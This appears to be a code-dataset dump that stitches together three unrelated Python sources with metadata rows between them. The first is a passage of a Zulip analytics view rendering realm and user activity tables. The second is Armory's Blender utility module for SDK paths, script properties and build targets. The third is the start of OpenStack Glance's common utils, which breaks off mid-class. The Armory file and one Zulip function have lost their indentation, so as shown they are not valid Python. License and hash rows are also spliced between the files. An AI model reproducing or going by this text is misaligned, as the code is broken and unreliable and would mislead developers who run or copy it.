    # type: (Dict[str, Dict[str, Any]]) -> str
    """Render one user's aggregated activity, most recent category first."""
    rows = [
        [
            format_date_for_activity_reports(totals['last_visit']),
            category,
            totals['count'],
        ]
        for category, totals in user_summary.items()
        if category != 'name'  # 'name' holds the full name, not totals
    ]
    rows.sort(key=lambda r: r[0], reverse=True)

    cols = [
        'last_visit',
        'client',
        'count',
    ]

    return make_table('User Activity', cols, rows)
def realm_user_summary_table(all_records, admin_emails):
    # type: (List[QuerySet], Set[Text]) -> Tuple[Dict[str, Dict[str, Any]], str]
    """Build the per-realm 'Summary' table: one row per user.

    `all_records` must be ordered by user email (groupby relies on
    contiguous groups).  Returns (user_records, html) where user_records
    maps email -> get_user_activity_summary() output, reused by the caller
    for the Clients table.
    """
    user_records = {}

    def by_email(record):
        # type: (QuerySet) -> str
        return record.user_profile.email

    for email, records in itertools.groupby(all_records, by_email):
        user_records[email] = get_user_activity_summary(list(records))

    def get_last_visit(user_summary, k):
        # type: (Dict[str, Dict[str, datetime]], str) -> Optional[datetime]
        if k in user_summary:
            return user_summary[k]['last_visit']
        else:
            return None

    def get_count(user_summary, k):
        # type: (Dict[str, Dict[str, str]], str) -> str
        if k in user_summary:
            return user_summary[k]['count']
        else:
            return ''

    def is_recent(val):
        # type: (Optional[datetime]) -> bool
        # "Recent" means within the last five minutes.
        age = datetime.now(val.tzinfo) - val
        return age.total_seconds() < 5 * 60

    rows = []
    for email, user_summary in user_records.items():
        email_link = user_activity_link(email)
        sent_count = get_count(user_summary, 'send')
        cells = [user_summary['name'], email_link, sent_count]
        row_class = ''
        for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
            visit = get_last_visit(user_summary, field)
            if field == 'use':
                # CSS classes for highlighting currently-active users and
                # realm administrators.
                if visit and is_recent(visit):
                    row_class += ' recently_active'
                if email in admin_emails:
                    row_class += ' admin'
            val = format_date_for_activity_reports(visit)
            cells.append(val)
        row = dict(cells=cells, row_class=row_class)
        rows.append(row)

    def by_used_time(row):
        # type: (Dict[str, Any]) -> str
        # cells[3] is the formatted 'use' timestamp; the YYYY-MM-DD HH:MM
        # format sorts correctly as a string.
        return row['cells'][3]

    rows = sorted(rows, key=by_used_time, reverse=True)

    cols = [
        'Name',
        'Email',
        'Total sent',
        'Heard from',
        'Message sent',
        'Pointer motion',
        'Desktop',
        'ZulipiOS',
        'Android',
    ]

    title = 'Summary'

    content = make_table(title, cols, rows, has_row_class=True)
    return user_records, content
@zulip_internal
def get_realm_activity(request, realm_str):
    # type: (HttpRequest, str) -> HttpResponse
    """Render the activity dashboard for a single realm.

    Pages: per-user summaries for humans and bots, a combined Clients
    table, and a two-week message-history table.  404s if the realm does
    not exist.
    """
    data = [] # type: List[Tuple[str, str]]
    all_user_records = {} # type: Dict[str, Any]

    try:
        admins = Realm.objects.get(string_id=realm_str).get_admin_users()
    except Realm.DoesNotExist:
        return HttpResponseNotFound("Realm %s does not exist" % (realm_str,))

    admin_emails = {admin.email for admin in admins}

    for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
        all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))

        user_records, content = realm_user_summary_table(all_records, admin_emails)
        all_user_records.update(user_records)

        data += [(page_title, content)]

    page_title = 'Clients'
    content = realm_client_table(all_user_records)
    data += [(page_title, content)]

    page_title = 'History'
    content = sent_messages_report(realm_str)
    data += [(page_title, content)]

    # Link to the external graphite dashboard for this realm.
    realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
    realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (realm_str,)

    title = realm_str
    return render_to_response(
        'analytics/activity.html',
        dict(data=data, realm_link=realm_link, title=title),
        request=request
    )
@zulip_internal
def get_user_activity(request, email):
# type: (HttpRequest, str) -> HttpResponse
records = get_user_activity_records_for_email(email)
data = [] # type: List[Tuple[str, str]]
user_summary = get_user_activity_summary(records)
content = user_activity_summary_table(user_summary)
data += [('Summary', content)]
content = raw_user_activity_table(records)
data += [('Info', content)]
title = email
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title),
request=request
)
| apache-2.0 | 1,357,763,504,589,575,200 | 32.502262 | 123 | 0.557969 | false | 3.885798 | false | false | false |
luboslenco/cyclesgame | blender/arm/utils.py | 1 | 24354 | import bpy
import json
import os
import glob
import platform
import zipfile
import re
import subprocess
import webbrowser
import numpy as np
import arm.lib.armpack
import arm.make_state as state
import arm.log as log
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def write_arm(filepath, output):
if filepath.endswith('.zip'):
with zipfile.ZipFile(filepath, 'w', zipfile.ZIP_DEFLATED) as zip_file:
if bpy.data.worlds['Arm'].arm_minimize:
zip_file.writestr('data.arm', arm.lib.armpack.packb(output))
else:
zip_file.writestr('data.json', json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
else:
if bpy.data.worlds['Arm'].arm_minimize:
with open(filepath, 'wb') as f:
f.write(arm.lib.armpack.packb(output))
else:
filepath_json = filepath.split('.arm')[0] + '.json'
with open(filepath_json, 'w') as f:
f.write(json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
def unpack_image(image, path, file_format='JPEG'):
print('Armory Info: Unpacking to ' + path)
image.filepath_raw = path
image.file_format = file_format
image.save()
def convert_image(image, path, file_format='JPEG'):
# Convert image to compatible format
print('Armory Info: Converting to ' + path)
ren = bpy.context.scene.render
orig_quality = ren.image_settings.quality
orig_file_format = ren.image_settings.file_format
orig_color_mode = ren.image_settings.color_mode
ren.image_settings.quality = 90
ren.image_settings.file_format = file_format
if file_format == 'PNG':
ren.image_settings.color_mode = 'RGBA'
image.save_render(path, scene=bpy.context.scene)
ren.image_settings.quality = orig_quality
ren.image_settings.file_format = orig_file_format
ren.image_settings.color_mode = orig_color_mode
def blend_name():
return bpy.path.basename(bpy.context.blend_data.filepath).rsplit('.')[0]
def build_dir():
return 'build_' + safestr(blend_name())
def get_fp():
wrd = bpy.data.worlds['Arm']
if wrd.arm_project_root != '':
return bpy.path.abspath(wrd.arm_project_root)
else:
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_fp_build():
return get_fp() + '/' + build_dir()
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
def get_gapi():
wrd = bpy.data.worlds['Arm']
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return getattr(item, target_to_gapi(item.arm_project_target))
if wrd.arm_runtime == 'Browser':
return 'webgl'
return arm.utils.get_player_gapi()
def get_rp():
wrd = bpy.data.worlds['Arm']
return wrd.arm_rplist[wrd.arm_rplist_index]
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
# Passed by load_post handler when armsdk is found in project folder
use_local_sdk = False
def get_sdk_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if use_local_sdk:
return get_fp() + '/armsdk/'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def get_ide_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
return '' if not hasattr(addon_prefs, 'ide_path') else addon_prefs.ide_path
def get_ffmpeg_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return addon_prefs.ffmpeg_path
def get_renderdoc_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
p = addon_prefs.renderdoc_path
if p == '' and get_os() == 'win':
pdefault = 'C:\\Program Files\\RenderDoc\\qrenderdoc.exe'
if os.path.exists(pdefault):
p = pdefault
return p
def get_player_gapi():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'opengl' if not hasattr(addon_prefs, 'player_gapi_' + get_os()) else getattr(addon_prefs, 'player_gapi_' + get_os())
def get_code_editor():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'kodestudio' if not hasattr(addon_prefs, 'code_editor') else addon_prefs.code_editor
def get_ui_scale():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1.0 if not hasattr(addon_prefs, 'ui_scale') else addon_prefs.ui_scale
def get_khamake_threads():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1 if not hasattr(addon_prefs, 'khamake_threads') else addon_prefs.khamake_threads
def get_compilation_server():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'compilation_server') else addon_prefs.compilation_server
def get_save_on_build():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'save_on_build') else addon_prefs.save_on_build
def get_viewport_controls():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'qwerty' if not hasattr(addon_prefs, 'viewport_controls') else addon_prefs.viewport_controls
def get_legacy_shaders():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'legacy_shaders') else addon_prefs.legacy_shaders
def get_relative_paths():
# Convert absolute paths to relative
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'relative_paths') else addon_prefs.relative_paths
def get_node_path():
if get_os() == 'win':
return get_sdk_path() + '/nodejs/node.exe'
elif get_os() == 'mac':
return get_sdk_path() + '/nodejs/node-osx'
else:
return get_sdk_path() + '/nodejs/node-linux64'
def get_kha_path():
if os.path.exists('Kha'):
return 'Kha'
return get_sdk_path() + '/Kha'
def get_haxe_path():
if get_os() == 'win':
return get_kha_path() + '/Tools/haxe/haxe.exe'
elif get_os() == 'mac':
return get_kha_path() + '/Tools/haxe/haxe-osx'
else:
return get_kha_path() + '/Tools/haxe/haxe-linux64'
def get_khamake_path():
return get_kha_path() + '/make'
def krom_paths(bin_ext=''):
sdk_path = get_sdk_path()
if arm.utils.get_os() == 'win':
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext + '.exe'
elif arm.utils.get_os() == 'mac':
krom_location = sdk_path + '/Krom/Krom.app/Contents/MacOS'
krom_path = krom_location + '/Krom' + bin_ext
else:
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext
return krom_location, krom_path
def fetch_bundled_script_names():
wrd = bpy.data.worlds['Arm']
wrd.arm_bundled_scripts_list.clear()
os.chdir(get_sdk_path() + '/armory/Sources/armory/trait')
for file in glob.glob('*.hx'):
wrd.arm_bundled_scripts_list.add().name = file.rsplit('.')[0]
script_props = {}
script_props_defaults = {}
def fetch_script_props(file):
with open(file) as f:
if '/' in file:
file = file.split('/')[-1]
if '\\' in file:
file = file.split('\\')[-1]
name = file.rsplit('.')[0]
script_props[name] = []
script_props_defaults[name] = []
lines = f.read().splitlines()
read_prop = False
for l in lines:
if not read_prop:
read_prop = l.lstrip().startswith('@prop')
if read_prop and 'var ' in l:
p = l.split('var ')[1]
valid_prop = False
# Has type
if ':' in p:
# Fetch default value
if '=' in p:
s = p.split('=')
ps = s[0].split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
else:
ps = p.split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = ''
valid_prop = True
# Fetch default value
elif '=' in p:
s = p.split('=')
prop = (s[0].strip(), None)
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
# Register prop
if valid_prop:
script_props[name].append(prop)
script_props_defaults[name].append(prop_value)
read_prop = False
def fetch_script_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# Sources
wrd.arm_scripts_list.clear()
sources_path = get_fp() + '/Sources/' + safestr(wrd.arm_project_package)
if os.path.isdir(sources_path):
os.chdir(sources_path)
# Glob supports recursive search since python 3.5 so it should cover both blender 2.79 and 2.8 integrated python
for file in glob.glob('**/*.hx', recursive=True):
name = file.rsplit('.')[0]
# Replace the path syntax for package syntax so that it can be searchable in blender traits "Class" dropdown
wrd.arm_scripts_list.add().name = name.replace(os.sep, '.')
fetch_script_props(file)
# Canvas
wrd.arm_canvas_list.clear()
canvas_path = get_fp() + '/Bundled/canvas'
if os.path.isdir(canvas_path):
os.chdir(canvas_path)
for file in glob.glob('*.json'):
wrd.arm_canvas_list.add().name = file.rsplit('.')[0]
os.chdir(get_fp())
def fetch_wasm_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# WASM modules
wrd.arm_wasm_list.clear()
sources_path = get_fp() + '/Bundled'
if os.path.isdir(sources_path):
os.chdir(sources_path)
for file in glob.glob('*.wasm'):
name = file.rsplit('.')[0]
wrd.arm_wasm_list.add().name = name
os.chdir(get_fp())
def fetch_trait_props():
for o in bpy.data.objects:
fetch_prop(o)
for s in bpy.data.scenes:
fetch_prop(s)
def fetch_prop(o):
for item in o.arm_traitlist:
if item.name not in script_props:
continue
props = script_props[item.name]
defaults = script_props_defaults[item.name]
# Remove old props
for i in range(len(item.arm_traitpropslist) - 1, -1, -1):
ip = item.arm_traitpropslist[i]
# if ip.name not in props:
if ip.name.split('(')[0] not in [p[0] for p in props]:
item.arm_traitpropslist.remove(i)
# Add new props
for i in range(0, len(props)):
p = props[i]
found = False
for ip in item.arm_traitpropslist:
if ip.name.replace(')', '').split('(')[0] == p[0]:
found = ip
break
# Not in list
if not found:
prop = item.arm_traitpropslist.add()
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
prop.value = defaults[i]
if found:
prop = item.arm_traitpropslist[found.name]
f = found.name.replace(')', '').split('(')
# Default value added and current value is blank (no override)
if (not found.value and defaults[i]):
prop.value = defaults[i]
# Type has changed, update displayed name
if (len(f) == 1 or (len(f) > 1 and f[1] != p[1])):
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
def fetch_bundled_trait_props():
# Bundled script props
for o in bpy.data.objects:
for t in o.arm_traitlist:
if t.type_prop == 'Bundled Script':
file_path = get_sdk_path() + '/armory/Sources/armory/trait/' + t.name + '.hx'
if os.path.exists(file_path):
fetch_script_props(file_path)
fetch_prop(o)
def update_trait_collections():
for col in bpy.data.collections:
if col.name.startswith('Trait|'):
bpy.data.collections.remove(col)
for o in bpy.data.objects:
for t in o.arm_traitlist:
if 'Trait|' + t.name not in bpy.data.collections:
col = bpy.data.collections.new('Trait|' + t.name)
else:
col = bpy.data.collections['Trait|' + t.name]
col.objects.link(o)
def to_hex(val):
return '#%02x%02x%02x%02x' % (int(val[3] * 255), int(val[0] * 255), int(val[1] * 255), int(val[2] * 255))
def color_to_int(val):
return (int(val[3] * 255) << 24) + (int(val[0] * 255) << 16) + (int(val[1] * 255) << 8) + int(val[2] * 255)
def safesrc(s):
s = safestr(s).replace('.', '_').replace('-', '_').replace(' ', '')
if s[0].isdigit():
s = '_' + s
return s
def safestr(s):
for c in r'[]/\;,><&*:%=+@!#^()|?^':
s = s.replace(c, '_')
return ''.join([i if ord(i) < 128 else '_' for i in s])
def asset_name(bdata):
s = bdata.name
# Append library name if linked
if bdata.library != None:
s += '_' + bdata.library.name
return s
def asset_path(s):
return s[2:] if s[:2] == '//' else s # Remove leading '//'
def extract_filename(s):
return os.path.basename(asset_path(s))
def get_render_resolution(scene):
render = scene.render
scale = render.resolution_percentage / 100
return int(render.resolution_x * scale), int(render.resolution_y * scale)
def get_project_scene_name():
return get_active_scene().name
def get_active_scene():
if not state.is_export:
return bpy.context.scene
else:
wrd = bpy.data.worlds['Arm']
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return item.arm_project_scene
def logic_editor_space(context_screen=None):
if context_screen == None:
context_screen = bpy.context.screen
if context_screen != None:
areas = context_screen.areas
for area in areas:
for space in area.spaces:
if space.type == 'NODE_EDITOR':
if space.node_tree != None and space.node_tree.bl_idname == 'ArmLogicTreeType':
return space
return None
def voxel_support():
# macos does not support opengl 4.5, needs metal
return state.target != 'html5' and get_os() != 'mac'
def get_cascade_size(rpdat):
cascade_size = int(rpdat.rp_shadowmap_cascade)
# Clamp to 4096 per cascade
if int(rpdat.rp_shadowmap_cascades) > 1 and cascade_size > 4096:
cascade_size = 4096
return cascade_size
def check_saved(self):
if bpy.data.filepath == "":
msg = "Save blend file first"
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
return True
def check_path(s):
for c in r'[];><&*%=+@!#^()|?^':
if c in s:
return False
for c in s:
if ord(c) > 127:
return False
return True
def check_sdkpath(self):
s = get_sdk_path()
if check_path(s) == False:
msg = "SDK path '{0}' contains special characters. Please move SDK to different path for now.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def check_projectpath(self):
s = get_fp()
if check_path(s) == False:
msg = "Project path '{0}' contains special characters, build process may fail.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def disp_enabled(target):
rpdat = get_rp()
if rpdat.arm_rp_displacement == 'Tessellation':
return target == 'krom' or target == 'native'
return rpdat.arm_rp_displacement != 'Off'
def is_object_animation_enabled(bobject):
# Checks if animation is present and enabled
if bobject.arm_animation_enabled == False or bobject.type == 'BONE' or bobject.type == 'ARMATURE':
return False
if bobject.animation_data and bobject.animation_data.action:
return True
return False
def is_bone_animation_enabled(bobject):
# Checks if animation is present and enabled for parented armature
if bobject.parent and bobject.parent.type == 'ARMATURE':
if bobject.parent.arm_animation_enabled == False:
return False
# Check for present actions
adata = bobject.parent.animation_data
has_actions = adata != None and adata.action != None
if not has_actions and adata != None:
if hasattr(adata, 'nla_tracks') and adata.nla_tracks != None:
for track in adata.nla_tracks:
if track.strips == None:
continue
for strip in track.strips:
if strip.action == None:
continue
has_actions = True
break
if has_actions:
break
if adata != None and has_actions:
return True
return False
def export_bone_data(bobject):
return bobject.find_armature() and is_bone_animation_enabled(bobject) and get_rp().arm_skin == 'On'
def kode_studio_mklink_win(sdk_path, ide_path):
# Fight long-path issues on Windows
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
def kode_studio_mklink_linux(sdk_path, ide_path):
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
def kode_studio_mklink_mac(sdk_path, ide_path):
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
def get_kode_path():
p = get_ide_path()
if p == '':
if get_os() == 'win':
p = get_sdk_path() + '/win32'
elif get_os() == 'mac':
p = get_sdk_path() + '/KodeStudio.app'
else:
p = get_sdk_path() + '/linux64'
return p
def get_kode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Kode Studio.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/kodestudio'
def get_vscode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Code.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/code'
def kode_studio(hx_path=None):
project_path = arm.utils.get_fp()
kode_bin = get_kode_bin()
if not os.path.exists(kode_bin):
kode_bin = get_vscode_bin()
if os.path.exists(kode_bin) and get_code_editor() == 'kodestudio':
if arm.utils.get_os() == 'win':
# kode_studio_mklink_win(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
elif arm.utils.get_os() == 'mac':
# kode_studio_mklink_mac(get_sdk_path(), get_kode_path())
args = ['"' + kode_bin + '"' + ' "' + arm.utils.get_fp() + '"']
if hx_path != None:
args[0] += ' "' + hx_path + '"'
subprocess.Popen(args, shell=True)
else:
# kode_studio_mklink_linux(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
else:
fp = hx_path if hx_path != None else arm.utils.get_fp()
webbrowser.open('file://' + fp)
def def_strings_to_array(strdefs):
defs = strdefs.split('_')
defs = defs[1:]
defs = ['_' + d for d in defs] # Restore _
return defs
def get_kha_target(target_name): # TODO: remove
if target_name == 'macos-hl':
return 'osx-hl'
elif target_name.startswith('krom'): # krom-windows
return 'krom'
elif target_name == 'custom':
return ''
return target_name
def target_to_gapi(arm_project_target):
# TODO: align target names
if arm_project_target == 'krom':
return 'arm_gapi_' + arm.utils.get_os()
elif arm_project_target == 'krom-windows':
return 'arm_gapi_win'
elif arm_project_target == 'windows-hl':
return 'arm_gapi_win'
elif arm_project_target == 'krom-linux':
return 'arm_gapi_linux'
elif arm_project_target == 'linux-hl':
return 'arm_gapi_linux'
elif arm_project_target == 'krom-macos':
return 'arm_gapi_mac'
elif arm_project_target == 'macos-hl':
return 'arm_gapi_mac'
elif arm_project_target == 'android-native-hl':
return 'arm_gapi_android'
elif arm_project_target == 'ios-hl':
return 'arm_gapi_ios'
elif arm_project_target == 'node':
return 'arm_gapi_html5'
else: # html5, custom
return 'arm_gapi_' + arm_project_target
def check_default_props():
wrd = bpy.data.worlds['Arm']
if len(wrd.arm_rplist) == 0:
wrd.arm_rplist.add()
wrd.arm_rplist_index = 0
if wrd.arm_project_name == '':
# Take blend file name
wrd.arm_project_name = arm.utils.blend_name()
def register(local_sdk=False):
global use_local_sdk
use_local_sdk = local_sdk
def unregister():
pass
| lgpl-3.0 | 2,749,772,502,997,039,600 | 35.08 | 127 | 0.581137 | false | 3.396179 | false | false | false |
ozamiatin/glance | glance/common/utils.py | 1 | 26028 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2014 SoftLayer Technologies, Inc.
# Copyright 2015 Mirantis, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import errno
try:
from eventlet import sleep
except ImportError:
from time import sleep
from eventlet.green import socket
import functools
import os
import platform
import re
import subprocess
import sys
import uuid
from OpenSSL import crypto
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import netutils
from oslo_utils import strutils
import six
from webob import exc
from glance.common import exception
from glance import i18n
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
# Headers that must never be accepted as user-settable image features.
# NOTE(review): presumably these would clobber transport-level or
# size-derived values if passed through — confirm against the callers
# that consult FEATURE_BLACKLIST.
FEATURE_BLACKLIST = ['content-length', 'content-type', 'x-image-meta-size']
# Whitelist of v1 API headers of form x-image-meta-xxx
# (get_image_meta_from_headers() rejects any other x-image-meta-* header
# with HTTPBadRequest).
IMAGE_META_HEADERS = ['x-image-meta-location', 'x-image-meta-size',
'x-image-meta-is_public', 'x-image-meta-disk_format',
'x-image-meta-container_format', 'x-image-meta-name',
'x-image-meta-status', 'x-image-meta-copy_from',
'x-image-meta-uri', 'x-image-meta-checksum',
'x-image-meta-created_at', 'x-image-meta-updated_at',
'x-image-meta-deleted_at', 'x-image-meta-min_ram',
'x-image-meta-min_disk', 'x-image-meta-owner',
'x-image-meta-store', 'x-image-meta-id',
'x-image-meta-protected', 'x-image-meta-deleted',
'x-image-meta-virtual_size']
# Name of the environment variable that carries an already-open socket fd
# into the server under test.
# NOTE(review): the consumer of this variable is not in this chunk —
# verify where the fd is actually read before relying on this note.
GLANCE_TEST_SOCKET_FD_STR = 'GLANCE_TEST_SOCKET_FD'
def chunkreadable(iter, chunk_size=65536):
    """
    If *iter* is also readable (exposes a ``read`` attribute), wrap it in
    a chunked reader that yields pieces of at most *chunk_size* bytes;
    otherwise hand the iterator back untouched.

    :param iter: an iter which may also be readable
    :param chunk_size: maximum size of chunk
    """
    if hasattr(iter, 'read'):
        return chunkiter(iter, chunk_size)
    return iter
def chunkiter(fp, chunk_size=65536):
    """
    Generator yielding successive reads of up to *chunk_size* from the
    file-like object *fp*, stopping at EOF (a falsy read result).

    :param fp: a file-like object
    :param chunk_size: maximum size of chunk
    """
    while True:
        piece = fp.read(chunk_size)
        if not piece:
            return
        yield piece
def cooperative_iter(iter):
    """
    Yield everything from *iter*, sleeping for zero seconds between items
    so other eventlet threads get a chance to run (prevents starvation
    when several images stream concurrently).

    :param iter: an iterator to wrap
    """
    try:
        for chunk in iter:
            sleep(0)
            yield chunk
    except Exception as err:
        # Log the failure but let the original exception propagate to
        # the consumer of the wrapped iterator.
        with excutils.save_and_reraise_exception():
            LOG.error(_LE("Error: cooperative_iter exception %s") % err)
def cooperative_read(fd):
    """
    Return a read function that proxies to ``fd.read`` but sleeps for zero
    seconds after every call, yielding control to other eventlet threads.

    :param fd: a file descriptor to wrap
    """
    def readfn(*args):
        data = fd.read(*args)
        sleep(0)
        return data
    return readfn
MAX_COOP_READER_BUFFER_SIZE = 134217728 # 128M seems like a sane buffer limit
class CooperativeReader(object):
    """
    An eventlet thread friendly class for reading in image data.

    When accessing data either through the iterator or the read method
    we perform a sleep to allow a co-operative yield. When there is more than
    one image being uploaded/downloaded this prevents eventlet thread
    starvation, ie allows all threads to be scheduled periodically rather than
    having the same thread be continuously active.

    If the wrapped object supports ``read()``, that path is delegated to
    :func:`cooperative_read`; otherwise ``read()`` is emulated on top of
    the object's iterator, buffering one chunk at a time.
    """
    def __init__(self, fd):
        """
        :param fd: Underlying image file object
        """
        self.fd = fd
        self.iterator = None
        # NOTE(markwash): if the underlying supports read(), overwrite the
        # default iterator-based implementation with cooperative_read which
        # is more straightforward
        if hasattr(fd, 'read'):
            self.read = cooperative_read(fd)
        else:
            # NOTE(review): self.iterator was already set to None above;
            # this assignment is redundant but harmless.
            self.iterator = None
            # Most recently fetched chunk, and the read offset inside it,
            # used by the iterator-backed read() below.
            self.buffer = ''
            self.position = 0

    def read(self, length=None):
        """Return the requested amount of bytes, fetching the next chunk of
        the underlying iterator when needed.

        This is replaced with cooperative_read in __init__ if the underlying
        fd already supports read().

        :param length: number of bytes to return; None means "whatever is
            buffered, or else the next whole chunk from the iterator".
        """
        if length is None:
            if len(self.buffer) - self.position > 0:
                # if no length specified but some data exists in buffer,
                # return that data and clear the buffer
                result = self.buffer[self.position:]
                self.buffer = ''
                self.position = 0
                return str(result)
            else:
                # otherwise read the next chunk from the underlying iterator
                # and return it as a whole. Reset the buffer, as subsequent
                # calls may specify the length
                try:
                    if self.iterator is None:
                        self.iterator = self.__iter__()
                    # NOTE(review): .next() is the Python 2 iterator
                    # protocol (this module targets py2 via six); under
                    # py3 this would be next(self.iterator).
                    return self.iterator.next()
                except StopIteration:
                    # Exhausted: mimic file semantics by returning ''.
                    return ''
                finally:
                    self.buffer = ''
                    self.position = 0
        else:
            # Accumulate exactly `length` bytes (or fewer at EOF) by
            # draining the buffer and pulling new chunks as needed.
            result = bytearray()
            while len(result) < length:
                if self.position < len(self.buffer):
                    to_read = length - len(result)
                    chunk = self.buffer[self.position:self.position + to_read]
                    result.extend(chunk)

                    # This check is here to prevent potential OOM issues if
                    # this code is called with unreasonably high values of read
                    # size. Currently it is only called from the HTTP clients
                    # of Glance backend stores, which use httplib for data
                    # streaming, which has readsize hardcoded to 8K, so this
                    # check should never fire. Regardless it still worths to
                    # make the check, as the code may be reused somewhere else.
                    if len(result) >= MAX_COOP_READER_BUFFER_SIZE:
                        raise exception.LimitExceeded()
                    self.position += len(chunk)
                else:
                    # Buffer exhausted: fetch the next chunk from the
                    # iterator, or return what we have at end of stream.
                    try:
                        if self.iterator is None:
                            self.iterator = self.__iter__()
                        self.buffer = self.iterator.next()
                        self.position = 0
                    except StopIteration:
                        self.buffer = ''
                        self.position = 0
                        # NOTE(review): str(bytearray) only produces the
                        # raw bytes on Python 2; on py3 it would yield the
                        # repr — confirm before porting.
                        return str(result)
            return str(result)

    def __iter__(self):
        # Delegate iteration to the wrapped object, with cooperative
        # yields between chunks.
